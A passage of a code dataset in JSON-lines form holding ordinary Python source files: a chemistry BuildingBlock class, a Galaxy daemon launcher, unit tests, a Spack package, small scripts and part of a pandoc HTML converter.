isinstance(functional_group, FunctionalGroup):\n yield functional_group\n else:\n # Else it's a factory.\n yield from functional_group.get_functional_groups(self)\n\n def _with_functional_groups(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> BuildingBlock:\n \"\"\"\n Modify the molecule.\n\n \"\"\"\n\n self._functional_groups = tuple(functional_groups)\n return self\n\n def with_functional_groups(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> BuildingBlock:\n \"\"\"\n Return a clone with specific functional groups.\n\n Parameters:\n\n functional_groups:\n :class:`.FunctionalGroup` instances which the clone\n should have.\n\n Returns:\n\n The clone.\n\n \"\"\"\n\n return self.clone()._with_functional_groups(functional_groups)\n\n def _with_canonical_atom_ordering(self) -> BuildingBlock:\n ordering = rdkit.CanonicalRankAtoms(self.to_rdkit_mol())\n super()._with_canonical_atom_ordering()\n id_map = {\n old_id: new_id\n for old_id, new_id in enumerate(ordering)\n }\n self._functional_groups = tuple(\n functional_group.with_ids(id_map)\n for functional_group in self._functional_groups\n )\n self._placer_ids = frozenset(\n id_map[placer_id]\n for placer_id in self._placer_ids\n )\n self._core_ids = frozenset(\n id_map[core_id]\n for core_id in self._core_ids\n )\n return self\n\n def get_num_functional_groups(self) -> int:\n \"\"\"\n Return the number of functional groups.\n\n Returns:\n\n The number of functional groups in the building block.\n\n \"\"\"\n\n return len(self._functional_groups)\n\n def get_functional_groups(\n self,\n fg_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> typing.Iterator[FunctionalGroup]:\n \"\"\"\n Yield the functional groups, ordered by id.\n\n Parameters:\n\n fg_ids:\n The ids of functional groups yielded. If ``None``, then\n all functional groups are yielded. Can be a single\n :class:`int`, if a single functional group is\n desired.\n\n Yields:\n\n A functional group of the building block.\n\n \"\"\"\n\n if fg_ids is None:\n fg_ids = range(len(self._functional_groups))\n elif isinstance(fg_ids, int):\n fg_ids = (fg_ids, )\n\n for fg_id in fg_ids:\n yield self._functional_groups[fg_id]\n\n def clone(self) -> BuildingBlock:\n clone = self._clone()\n clone._functional_groups = self._functional_groups\n clone._placer_ids = self._placer_ids\n clone._core_ids = self._core_ids\n return clone\n\n def get_num_placers(self) -> int:\n \"\"\"\n Return the number of *placer* atoms in the building block.\n\n Returns:\n\n The number of *placer* atoms in the building block.\n\n \"\"\"\n\n return len(self._placer_ids)\n\n def get_placer_ids(self) -> typing.Iterator[int]:\n \"\"\"\n Yield the ids of *placer* atoms.\n\n *Placer* atoms are those, which should be used to calculate\n the position of the building block.\n\n See Also:\n\n :meth:`.FunctionalGroup.get_placer_ids`\n\n Yields:\n\n The id of a *placer* atom.\n\n \"\"\"\n\n yield from self._placer_ids\n\n def get_core_atom_ids(self) -> typing.Iterator[int]:\n \"\"\"\n Yield ids of atoms which form the core of the building block.\n\n This includes all atoms in the building block not part of a\n functional group, as well as any atoms in a functional group,\n specifically labelled as core atoms.\n\n See Also:\n\n :meth:`.FunctionalGroup.get_core_atom_ids`\n\n Yields:\n\n The id of a *core* atom.\n\n\n \"\"\"\n\n yield from self._core_ids\n\n def with_canonical_atom_ordering(self) -> BuildingBlock:\n return self.clone()._with_canonical_atom_ordering()\n\n def with_centroid(\n self,\n position: np.ndarray,\n atom_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> BuildingBlock:\n\n return self.clone()._with_centroid(position, atom_ids)\n\n def with_displacement(\n self,\n displacement: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_displacement(displacement)\n\n def with_position_matrix(\n self,\n position_matrix: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_position_matrix(position_matrix)\n\n def with_rotation_about_axis(\n self,\n angle: float,\n axis: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_about_axis(\n angle=angle,\n axis=axis,\n origin=origin,\n )\n\n def with_rotation_between_vectors(\n self,\n start: np.ndarray,\n target: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_between_vectors(\n start=start,\n target=target,\n origin=origin,\n )\n\n def with_rotation_to_minimize_angle(\n self,\n start: np.ndarray,\n target: np.ndarray,\n axis: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_to_minimize_angle(\n start=start,\n target=target,\n axis=axis,\n origin=origin,\n )\n\n def with_structure_from_file(\n self,\n path: str,\n extension: typing.Optional[str] = None,\n ) -> BuildingBlock:\n\n return typing.cast(\n BuildingBlock,\n super().with_structure_from_file(\n path=path,\n extension=extension,\n )\n )\n\n def write(\n self,\n path: str,\n atom_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> BuildingBlock:\n\n return typing.cast(\n BuildingBlock,\n super().write(path, atom_ids)\n )\n\n def __str__(self) -> str:\n if self._functional_groups:\n fg_repr = f', {self._functional_groups!r}'\n else:\n fg_repr = ''\n\n smiles = rdkit.MolToSmiles(\n mol=rdkit.RemoveHs(self.to_rdkit_mol()),\n )\n return f'{self.__class__.__name__}({smiles!r}{fg_repr})'\n\n def __repr__(self) -> str:\n return str(self)\n"} {"ext": "py", "sha": "1a2f44021d4e117d94bf6f0a764f46971f807d64", "content": "#!/usr/bin/env python\n\"\"\" Entry point for starting Galaxy without starting as part of a web server.\n\nExample Usage: Start a job/workflow handler without a web server and with\na given name using.\n\ngalaxy-main --server-name handler0\n\nStart as a daemon with (requires daemonized - install with 'pip install daemonize'):\n\ngalaxy-main -d --daemon-log-file=handler0-daemon.log --pid-file handler0.pid --server-name handler0\n\nIn daemon mode logging of Galaxy (as opposed to this script) is configured via\na loggers section in Galaxy's ini file - this can be overridden with sensible\ndefaults logging to a single file with the following:\n\ngalaxy-main -d --server-name handler0 --daemon-log-file=handler0-daemon.log --pid-file handler0.pid --log-file handler0.log\n\nThis can also be used to start Galaxy as a uWSGI mule, e.g. for job handling:\n\nuwsgi ... --py-call-osafterfork --mule=lib/galaxy/main.py --mule=lib/galaxy/main.py --farm=job-handlers:1,2\n\nThe --py-call-osafterfork allows for proper shutdown on SIGTERM/SIGINT.\n\"\"\"\nimport functools\nimport logging\nimport os\nimport signal\nimport sys\nimport threading\nfrom argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom logging.config import fileConfig\n\ntry:\n from daemonize import Daemonize\nexcept ImportError:\n Daemonize = None\n\ntry:\n import uwsgi\nexcept ImportError:\n uwsgi = None\n\nlog = logging.getLogger(__name__)\n\nreal_file = os.path.realpath(__file__)\nGALAXY_ROOT_DIR_ = os.path.abspath(os.path.join(os.path.dirname(real_file), os.pardir))\nif not os.path.exists(os.path.join(GALAXY_ROOT_DIR_, 'run.sh')):\n # Galaxy is installed\n GALAXY_ROOT_DIR = None\nelse:\n GALAXY_ROOT_DIR = GALAXY_ROOT_DIR_\n GALAXY_LIB_DIR = os.path.join(GALAXY_ROOT_DIR_, \"lib\")\n try:\n sys.path.insert(1, GALAXY_LIB_DIR)\n except Exception:\n log.exception(\"Failed to add Galaxy to sys.path\")\n raise\nfrom galaxy.main_config import (\n absolute_config_path,\n config_is_ini,\n DEFAULT_CONFIG_SECTION,\n DEFAULT_INI_APP,\n find_config,\n)\nfrom galaxy.util import unicodify\nfrom galaxy.web_stack import get_app_kwds\n\nREQUIRES_DAEMONIZE_MESSAGE = \"Attempted to use Galaxy in daemon mode, but daemonize is unavailable.\"\n\nDEFAULT_PID = \"galaxy.pid\"\nDEFAULT_VERBOSE = True\nDESCRIPTION = \"Daemonized entry point for Galaxy.\"\n\nSHUTDOWN_MSG = '__SHUTDOWN__'\nUWSGI_FARMS_VAR = '_GALAXY_UWSGI_FARM_NAMES'\n\n\nexit = threading.Event()\n\n\ndef load_galaxy_app(\n config_builder,\n config_env=False,\n log=None,\n attach_to_pools=None,\n **kwds\n):\n # Allow specification of log so daemon can reuse properly configured one.\n if log is None:\n log = logging.getLogger(__name__)\n\n # If called in daemon mode, set the ROOT directory and ensure Galaxy is on\n # sys.path.\n if config_env:\n try:\n os.chdir(GALAXY_ROOT_DIR)\n except Exception:\n log.exception(\"Failed to chdir\")\n raise\n\n config_builder.setup_logging()\n from galaxy.util.properties import load_app_properties\n kwds = config_builder.app_kwds()\n kwds = load_app_properties(**kwds)\n from galaxy.app import UniverseApplication\n app = UniverseApplication(\n global_conf=config_builder.global_conf(),\n attach_to_pools=attach_to_pools,\n **kwds\n )\n app.database_heartbeat.start()\n app.application_stack.log_startup()\n return app\n\n\ndef handle_signal(signum, frame):\n log.info('Received signal %d, exiting', signum)\n if uwsgi and 'mule_id' in dir(uwsgi) and uwsgi.mule_id() > 0:\n farms = os.environ.get(UWSGI_FARMS_VAR, None)\n if farms:\n for farm in farms.split(','):\n uwsgi.farm_msg(farm, SHUTDOWN_MSG)\n else:\n uwsgi.mule_msg(SHUTDOWN_MSG, uwsgi.mule_id())\n exit.set()\n\n\ndef register_signals():\n for name in ('TERM', 'INT', 'HUP'):\n sig = getattr(signal, 'SIG%s' % name)\n signal.signal(sig, handle_signal)\n\n\ndef app_loop(args, log):\n try:\n config_builder = GalaxyConfigBuilder(args)\n config_env = GALAXY_ROOT_DIR is not None\n galaxy_app = load_galaxy_app(\n config_builder,\n config_env=config_env,\n log=log,\n attach_to_pools=args.attach_to_pool,\n )\n except BaseException:\n log.exception(\"Failed to initialize Galaxy application\")\n raise\n try:\n # A timeout is required or the signals won't be handled\n while not exit.wait(20):\n pass\n except (KeyboardInterrupt, SystemExit):\n pass\n try:\n galaxy_app.shutdown()\n except Exception:\n log.exception(\"Failed to shutdown Galaxy application\")\n raise\n\n\nclass GalaxyConfigBuilder:\n \"\"\" Generate paste-like configuration from supplied command-line arguments.\n \"\"\"\n\n def __init__(self, args=None, **kwds):\n self.config_file = None\n self.config_section = None\n self.app_name = kwds.get(\"app\") or (args and args.app) or DEFAULT_CONFIG_SECTION\n config_file = kwds.get(\"config_file\", None) or (args and args.config_file)\n # If given app_conf_path - use that - else we need to ensure we have a\n # config file path.\n if not config_file and 'config_file' in self.app_kwds():\n config_file = self.app_kwds()['config_file']\n if not config_file:\n galaxy_root = kwds.get(\"galaxy_root\", GALAXY_ROOT_DIR)\n config_file = find_config(config_file, galaxy_root)\n config_file = absolute_config_path(config_file, galaxy_root=galaxy_root)\n self.config_file = unicodify(config_file)\n # FIXME: this won't work for non-Paste ini configs\n if self.config_is_ini:\n self.config_section = \"app:%s\" % unicodify(kwds.get(\"app\") or (args and args.app) or DEFAULT_INI_APP)\n else:\n self.config_section = self.app_name\n self.log_file = (args and args.log_file)\n\n @classmethod\n def populate_options(cls, arg_parser):\n arg_parser.add_argument(\"-c\", \"--config-file\", default=None, help=\"Galaxy config file (defaults to config/galaxy.ini)\")\n arg_parser.add_argument(\"--ini-path\", default=None, help=\"DEPRECATED: use -c/--config-file\")\n arg_parser.add_argument(\"--app\", default=None, help=\"app section in config file (defaults to 'galaxy' for YAML/JSON, 'main' (w/ 'app:' prepended) for INI\")\n arg_parser.add_argument(\"-d\", \"--daemonize\", default=False, help=\"Daemonize process\", action=\"store_true\")\n arg_parser.add_argument(\"--daemon-log-file\", default=None, help=\"log file for daemon script \")\n arg_parser.add_argument(\"--log-file\", default=None, help=\"Galaxy log file (overrides log configuration in config_file if set)\")\n arg_parser.add_argument(\"--pid-file\", default=DEFAULT_PID, help=\"pid file (default is %s)\" % DEFAULT_PID)\n arg_parser.add_argument(\"--server-name\", default=None, help=\"set a galaxy server name\")\n arg_parser.add_argument(\"--attach-to-pool\", action=\"append\", default=['job-handlers'], help=\"attach to asynchronous worker pool (specify multiple times for multiple pools)\")\n\n @property\n def config_is_ini(self):\n return config_is_ini(self.config_file)\n\n def app_kwds(self):\n kwds = get_app_kwds(self.app_name, app_name=self.app_name)\n if 'config_file' not in kwds:\n kwds['config_file'] = self.config_file\n if 'config_section' not in kwds:\n kwds['config_section'] = self.config_section\n return kwds\n\n def global_conf(self):\n conf = {}\n if self.config_is_ini:\n conf[\"__file__\"] = self.config_file\n return conf\n\n def setup_logging(self):\n # Galaxy will attempt to setup logging if loggers is not present in\n # ini config file - this handles that loggers block however if present\n # (the way paste normally would)\n if not self.config_file:\n return\n if self.config_is_ini:\n raw_config = ConfigParser()\n raw_config.read([self.config_file])\n if raw_config.has_section('loggers'):\n config_file = os.path.abspath(self.config_file)\n fileConfig(\n config_file,\n dict(__file__=config_file, here=os.path.dirname(config_file))\n )\n\n\ndef main(func=app_loop):\n arg_parser = ArgumentParser(description=DESCRIPTION)\n GalaxyConfigBuilder.populate_options(arg_parser)\n args = arg_parser.parse_args()\n if args.ini_path and not args.config_file:\n args.config_file = args.ini_path\n if args.log_file:\n os.environ[\"GALAXY_CONFIG_LOG_DESTINATION\"] = os.path.abspath(args.log_file)\n if args.server_name:\n os.environ[\"GALAXY_CONFIG_SERVER_NAME\"] = args.server_name\n pid_file = args.pid_file\n\n log.setLevel(logging.DEBUG)\n log.propagate = False\n register_signals()\n if args.daemonize:\n if Daemonize is None:\n raise ImportError(REQUIRES_DAEMONIZE_MESSAGE)\n\n keep_fds = []\n if args.daemon_log_file:\n fh = logging.FileHandler(args.daemon_log_file, \"w\")\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n keep_fds.append(fh.stream.fileno())\n else:\n fh = logging.StreamHandler(sys.stderr)\n fh.setLevel(logging.DEBUG)\n log.addHandler(fh)\n\n daemon = Daemonize(\n app=\"galaxy\",\n pid=pid_file,\n action=functools.partial(func, args, log),\n verbose=DEFAULT_VERBOSE,\n logger=log,\n keep_fds=keep_fds,\n )\n daemon.start()\n else:\n func(args, log)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2f4535555f2da39e3616818a12b5a4c107d47b", "content": "# -*- coding: utf-8 -*-\nimport sugartensor as tf\nimport matplotlib.pyplot as plt\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n#\n# hyper parameters\n#\n\nbatch_size = 25\nz_dim = 50\n\n\n#\n# create generator\n#\n\n# random uniform seed\nz = tf.random_uniform((batch_size, z_dim))\n\nwith tf.sg_context(name='generator', size=5, stride=2, act='relu', bn=True):\n # generator network\n gen = (z.sg_dense(dim=1024)\n .sg_dense(dim=7*7*128)\n .sg_reshape(shape=(-1, 7, 7, 128))\n .sg_upconv(dim=64)\n .sg_upconv(dim=1, act='sigmoid', bn=False)\n .sg_squeeze())\n\n\n#\n# draw samples\n#\n\nwith tf.Session() as sess:\n tf.sg_init(sess)\n # restore parameters\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint('asset/train/ckpt'))\n\n # run generator\n imgs = sess.run(gen)\n\n # plot result\n _, ax = plt.subplots(5, 5, sharex=True, sharey=True)\n for i in range(5):\n for j in range(5):\n ax[i][j].imshow(imgs[i * 5 + j], 'gray')\n ax[i][j].set_axis_off()\n plt.savefig('asset/train/sample.png', dpi=600)\n tf.sg_info('Sample image saved to \"asset/train/sample.png\"')\n plt.close()\n"} {"ext": "py", "sha": "1a2f46441e61603778a4538a28f056da2e0c9228", "content": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy import Item, Field\n\n\n# core thinker object\n\"\"\"thinker item; represents one Wikipedia page, unless no page\"\"\"\nclass Thinker(Item):\n name = Field()\n link = Field()\n\n # lists of names\n influences = Field()\n influenced = Field()\n"} {"ext": "py", "sha": "1a2f46b3cae6de88140e6ec40ea6d4d8cd467da9", "content": "from arm.logicnode.arm_nodes import *\n\n\nclass RandomBooleanNode(ArmLogicTreeNode):\n \"\"\"Generates a random boolean.\"\"\"\n bl_idname = 'LNRandomBooleanNode'\n bl_label = 'Random Boolean'\n arm_version = 1\n\n def arm_init(self, context):\n self.add_output('ArmBoolSocket', 'Bool')\n"} {"ext": "py", "sha": "1a2f4a9003f7056f98e14377d576f3c434efd272", "content": "# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for tfx.components.example_gen.utils.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Standard Imports\n\nimport tensorflow as tf\nfrom tfx.components.example_gen import utils\n\n\nclass UtilsTest(tf.test.TestCase):\n\n def test_get_default_output_config(self):\n output_config = utils.get_default_output_config()\n self.assertEqual(2, len(output_config.split_config.splits))\n\n\nif __name__ == '__main__':\n tf.test.main()\n"} {"ext": "py", "sha": "1a2f4ba51b1638be24e791d8458fa4801710132b", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\n\nfrom pelican.generators import ArticlesGenerator\nfrom pelican.tests.support import unittest, get_settings\nimport sub_parts\n\nCUR_DIR = os.path.dirname(__file__)\n\n\nclass TestSubParts(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.temp_path = mkdtemp(prefix='pelicantests.')\n settings = get_settings(filenames={})\n settings['PATH'] = os.path.join(CUR_DIR, 'test_data')\n settings['AUTHOR'] = 'Me'\n settings['DEFAULT_DATE'] = (1970, 1, 1)\n settings['DEFAULT_CATEGORY'] = 'Default'\n settings['FILENAME_METADATA'] = '(?P[^.]+)'\n settings['PLUGINS'] = [sub_parts]\n settings['CACHE_CONTENT'] = False\n context = settings.copy()\n context['generated_content'] = dict()\n context['static_links'] = set()\n cls.generator = ArticlesGenerator(\n context=context, settings=settings,\n path=settings['PATH'], theme=settings['THEME'], output_path=cls.temp_path)\n cls.generator.generate_context()\n cls.all_articles = list(cls.generator.articles)\n sub_parts.patch_subparts(cls.generator)\n\n @classmethod\n def tearDownClass(cls):\n rmtree(cls.temp_path)\n\n def test_all_articles(self):\n self.assertEqual(\n sorted(['noparent', 'parent',\n 'parent--explicit', 'parent--implicit']),\n sorted([a.slug for a in self.all_articles]))\n\n def test_articles(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in self.generator.articles]))\n\n def test_dates(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in self.generator.dates]))\n\n def test_categories(self):\n self.assertEqual(\n sorted(['noparent', 'parent']),\n sorted([a.slug for a in self.generator.categories[0][1]]))\n\n def test_tags(self):\n self.assertEqual(\n sorted([a.slug for a in self.all_articles]),\n sorted([a.slug for a in self.generator.tags['atag']]))\n\n def test_authors(self):\n self.assertEqual(\n sorted([a.slug for a in self.all_articles]),\n sorted([a.slug for a in self.generator.authors[0][1]]))\n\n def test_subparts(self):\n for a in self.all_articles:\n if a.slug == 'parent':\n self.assertTrue(hasattr(a, 'subparts'))\n self.assertEqual(\n sorted(['parent--explicit', 'parent--implicit']),\n sorted([a.slug for a in a.subparts]))\n else:\n self.assertFalse(hasattr(a, 'subparts'))\n\n def test_subpart_of(self):\n for a in self.all_articles:\n if '--' in a.slug:\n self.assertTrue(hasattr(a, 'subpart_of'))\n self.assertEqual('parent', a.subpart_of.slug)\n else:\n self.assertFalse(hasattr(a, 'subpart_of'))\n\n def test_subtitle(self):\n for a in self.all_articles:\n if '--' in a.slug:\n self.assertTrue(hasattr(a, 'subtitle'))\n self.assertEqual(a.title,\n a.subtitle + ', ' + a.subpart_of.title)\n\n\nclass TestSubPartsPhotos(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.temp_path = mkdtemp(prefix='pelicantests.')\n settings = get_settings(filenames={})\n settings['PATH'] = os.path.join(CUR_DIR, 'test_data')\n settings['AUTHOR'] = 'Me'\n settings['DEFAULT_DATE'] = (1970, 1, 1)\n settings['DEFAULT_CATEGORY'] = 'Default'\n settings['FILENAME_METADATA'] = '(?P[^.]+)'\n settings['PLUGINS'] = [sub_parts]\n settings['CACHE_CONTENT'] = False\n context = settings.copy()\n context['generated_content'] = dict()\n context['static_links'] = set()\n cls.generator = ArticlesGenerator(\n context=context, settings=settings,\n path=settings['PATH'], theme=settings['THEME'], output_path=cls.temp_path)\n cls.generator.generate_context()\n cls.all_articles = list(cls.generator.articles)\n for a in cls.all_articles:\n a.photo_gallery = [('i.jpg', 'i.jpg', 'it.jpg', '', '')]\n sub_parts.patch_subparts(cls.generator)\n\n @classmethod\n def tearDownClass(cls):\n rmtree(cls.temp_path)\n\n def test_subphotos(self):\n for a in self.all_articles:\n if a.slug == 'parent':\n self.assertTrue(hasattr(a, 'subphotos'))\n self.assertEqual(3, a.subphotos)\n else:\n self.assertFalse(hasattr(a, 'subphotos'))\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4bf38709bca0c900194842760c3304bedeff", "content": "import turtle\nimport os\n\nt = turtle.Pen()\n#t.speed(0)\nt.shape(\"turtle\")\nt.left(90)\nfor i in range(6):\n t.forward(100)\n t.right(60)\n for j in range(3):\n t.forward(20)\n t.backward(20)\n t.left(60)\n t.right(120)\n t.backward(100)\n t.left(60)\n\nos.system(\"Pause\")"} {"ext": "py", "sha": "1a2f4c2681d3490af76ce5c1f381f74258cb1d49", "content": "##############################################################################\n# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Spack.\n# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.\n# LLNL-CODE-647188\n#\n# For details, see https://github.com/spack/spack\n# Please also see the NOTICE and LICENSE files for our notice and the LGPL.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License (as\n# published by the Free Software Foundation) version 2.1, February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and\n# conditions of the GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n##############################################################################\nfrom spack import *\n\n\nclass Xbacklight(AutotoolsPackage):\n \"\"\"Xbacklight is used to adjust the backlight brightness where supported.\n It uses the RandR extension to find all outputs on the X server\n supporting backlight brightness control and changes them all in the\n same way.\"\"\"\n\n homepage = \"http://cgit.freedesktop.org/xorg/app/xbacklight\"\n url = \"https://www.x.org/archive/individual/app/xbacklight-1.2.1.tar.gz\"\n\n version('1.2.1', 'e8e4c86b0f867e23aa3532618a697609')\n\n depends_on('libxcb')\n depends_on('xcb-util')\n\n depends_on('pkgconfig', type='build')\n depends_on('util-macros', type='build')\n"} {"ext": "py", "sha": "1a2f4c653b260f819dd0c1ba1773663bf9adac68", "content": "import os\n\n\ndef align(step):\n path = os.getcwd()\n file_path = os.path.join(path, 'whales.txt')\n file1 = open(file_path, 'r')\n Lines = file1.readlines()\n initial_pos = [0] * 2000\n final = 0\n for line in Lines:\n input = line.strip()\n poss = input.split(\",\")\n prev_fuel = -1\n for median in range(0, int(poss[len(poss)-1])+1):\n fuel = 0\n for pos in poss:\n n = abs(int(pos) - int(median))\n fuel += n * (n+1)/2 if step else n\n if fuel < prev_fuel or prev_fuel == -1:\n prev_fuel = fuel\n\n print(int(prev_fuel))\n\n\nif __name__ == \"__main__\":\n align(False)\n align(True)\n"} {"ext": "py", "sha": "1a2f4e17d97df7bbbfca1934c1f3300bf31c9b4a", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the Zeitgeist event formatter.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nfrom plaso.formatters import zeitgeist\n\nfrom tests.formatters import test_lib\n\n\nclass ZeitgeistFormatterTest(test_lib.EventFormatterTestCase):\n \"\"\"Tests for the Zeitgeist activity database event formatter.\"\"\"\n\n def testInitialization(self):\n \"\"\"Tests the initialization.\"\"\"\n event_formatter = zeitgeist.ZeitgeistFormatter()\n self.assertIsNotNone(event_formatter)\n\n def testGetFormatStringAttributeNames(self):\n \"\"\"Tests the GetFormatStringAttributeNames function.\"\"\"\n event_formatter = zeitgeist.ZeitgeistFormatter()\n\n expected_attribute_names = ['subject_uri']\n\n self._TestGetFormatStringAttributeNames(\n event_formatter, expected_attribute_names)\n\n # TODO: add test for GetMessages.\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f4e17e44131e61bca54ff4dcb336000f8d1c2", "content": "#!/usr/bin/env python3\n\"\"\"\nConvert $1 -- a markdown file to an HTML file in `/tmp/vim//.html`.\n\"\"\"\n\n# Standard Library\nfrom os.path import realpath, basename, isfile, isdir, dirname, abspath\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport re\nimport logging\nfrom logging import Logger\nfrom typing import Dict, Iterable, Optional, Set, Text, List\nfrom subprocess import DEVNULL, PIPE, run\n\nfrom meta import MATHJAX_CONFS, LongOpt, CodeStyle, FromFmt, Ext, ToFmt\nfrom utils import validate_executables, require_exists, vimdir_path, ensure_exists\n\n# initalise logging with sane configuration\nlogging.basicConfig(level=logging.WARN,\n format=\"%(levelname)s:%(asctime)s %(message)s\")\n\nlog: Logger = logging.getLogger()\n\nvalidate_executables([\"pandoc\"])\n\n\n# NOTE this will try to include a lua filter from `./task-list.lua`.\nclass PandocCmd:\n def __init__(\n self,\n input_file: Text,\n stylesheet: Text = vimdir_path(\"css\", \"styles.css\"),\n javascript: Text = vimdir_path(\"js\", \"script.js\"),\n from_fmt: FromFmt = FromFmt.MARKDOWN,\n to_fmt: ToFmt = ToFmt.HTML5,\n exts: List[Ext] = [\n Ext.ASCII_IDENTIFIERS,\n Ext.AUTOLINK_BARE_URIS,\n Ext.COMPACT_DEFINITION_LISTS,\n Ext.FENCED_DIVS,\n Ext.GFM_AUTO_IDENTIFIERS,\n Ext.INTRAWORD_UNDERSCORES,\n Ext.MARKDOWN_ATTRIBUTE,\n Ext.MMD_HEADER_IDENTIFIERS,\n Ext.MMD_LINK_ATTRIBUTES,\n Ext.SMART,\n Ext.TEX_MATH_DOLLARS,\n Ext.TEX_MATH_DOUBLE_BACKSLASH,\n Ext.TEX_MATH_SINGLE_BACKSLASH,\n ],\n no_exts: List[Ext] = [Ext.ALL_SYMBOLS_ESCAPABLE, Ext.ESCAPED_LINE_BREAKS],\n long_opts: Dict[LongOpt, Optional[Text]] = {\n LongOpt.ATX_HEADERS: None,\n LongOpt.REFERENCE_LOCATION: \"document\",\n LongOpt.SECTION_DIVS: None,\n LongOpt.EMAIL_OBFUSCATION: \"javascript\",\n },\n code_style: CodeStyle = CodeStyle.TANGO,\n mathjax_version: Text = \"2.7.5\",\n mathjax_conf: Text = \"TeX-AMS_HTML\",\n width: int = 80,\n toc_depth: int = 3,\n ) -> None:\n\n log.debug(\"initalising a PandocCmd object\")\n\n self.exts: List[Ext] = []\n self.no_exts: List[Ext] = []\n self.long_opts: Dict[LongOpt, Optional[Text]] = dict()\n\n self.set_opts(long_opts).set_exts(exts).set_no_exts(no_exts).set_input_file(\n input_file\n ).set_opt(LongOpt.STANDALONE).set_to_fmt(to_fmt).set_from_fmt(\n from_fmt\n ).set_mathjax(\n mathjax_version, mathjax_conf\n ).set_width(\n width\n ).set_stylesheet(\n stylesheet\n ).set_code_style(\n code_style\n ).set_javascript(\n javascript\n )\n\n if toc_depth:\n self.set_toc_depth(toc_depth).set_opt(LongOpt.TOC)\n\n lua_filter: str = os.path.join(os.path.dirname(\n os.path.abspath(__file__)), 'task-list.lua')\n\n if isfile(lua_filter):\n self.set_opt(LongOpt.LUA_FILTER, lua_filter)\n else:\n log.error(f'failed to find lua filter ./{lua_filter}')\n\n def set_from_fmt(self, fmt: FromFmt) -> object:\n assert fmt in FromFmt, f\"from format '{fmt}' invalid\"\n self.from_fmt: FromFmt = fmt\n return self\n\n def set_opt(self, key: LongOpt, val: Optional[Text] = None) -> object:\n self.long_opts[key] = val\n return self\n\n def set_opts(self, pairs: Dict[LongOpt, Optional[Text]]) -> object:\n for (k, v) in pairs.items():\n self.set_opt(k, v)\n return self\n\n def set_to_fmt(self, fmt: ToFmt) -> object:\n self.to_fmt = fmt\n return self\n\n def set_input_file(self, file_path: Text) -> object:\n require_exists(file_path)\n self.input_file = file_path\n return self\n\n def set_width(self, n: int) -> object:\n assert n and n >= 0, f\"invalid value {str(n)}\"\n return self.set_opt(LongOpt.COLUMNS, str(n))\n\n def set_stylesheet(self, css_path: Text) -> object:\n require_exists(css_path)\n return self.set_opt(LongOpt.CSS, css_path)\n\n def set_javascript(self, js_path: Text) -> object:\n require_exists(js_path)\n self.javascript = js_path\n return self\n\n def set_toc_depth(self, n: int) -> object:\n assert n and n >= 0, f\"invalid value {n}\"\n return self.set_opt(LongOpt.TOC_DEPTH, str(n))\n\n def set_code_style(self, style: CodeStyle) -> object:\n return self.set_opt(LongOpt.HIGHLIGHT_STYLE, style._name_.lower())\n\n def set_mathjax(self, version: Text, cfg: Text) -> object:\n assert cfg and cfg in MATHJAX_CONFS, f\"unreconginsed MathJax config {cfg}\"\n assert (\n version\n and len(version) >= 3\n and version[0] == \"2\"\n and version[1] == \".\"\n and str.isdigit(version[2])\n ), f\"unrecognised MathJax version {version}\"\n return self.set_opt(\n LongOpt.MATHJAX,\n f\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/{version}/MathJax.js?config={cfg}\",\n )\n\n def set_exts(self, exts: Iterable[Ext]) -> object:\n for ext in exts:\n self.set_ext(ext)\n 